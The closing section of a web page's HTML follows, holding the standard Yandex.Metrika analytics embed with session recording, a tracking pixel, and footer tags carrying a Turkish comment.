yandex_counter = "yaCounter44481739";
(function (d, w, c) {
	 (w[c] = w[c] || []).push(function() {
			 try {
					 w.yandex_counter = new Ya.Metrika({id:yandex_id, enableAll: true, webvisor:true});
			 } catch(e) {}
	 });

	 var n = d.getElementsByTagName("script")[0],
			 s = d.createElement("script"),
			 f = function () { n.parentNode.insertBefore(s, n); };
	 s.type = "text/javascript";
	 s.async = true;
	 s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js";

	 if (w.opera == "[object Opera]") {
			 d.addEventListener("DOMContentLoaded", f);
	 } else { f(); }
})(document, window, "yandex_metrika_callbacks");

</script>
<noscript><div><img src="//mc.yandex.ru/watch/44481739" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->


            <!-- // script dosyalarını çağır-->
          </footer>
          <!-- // Footer  -->

      </body>
      </html>
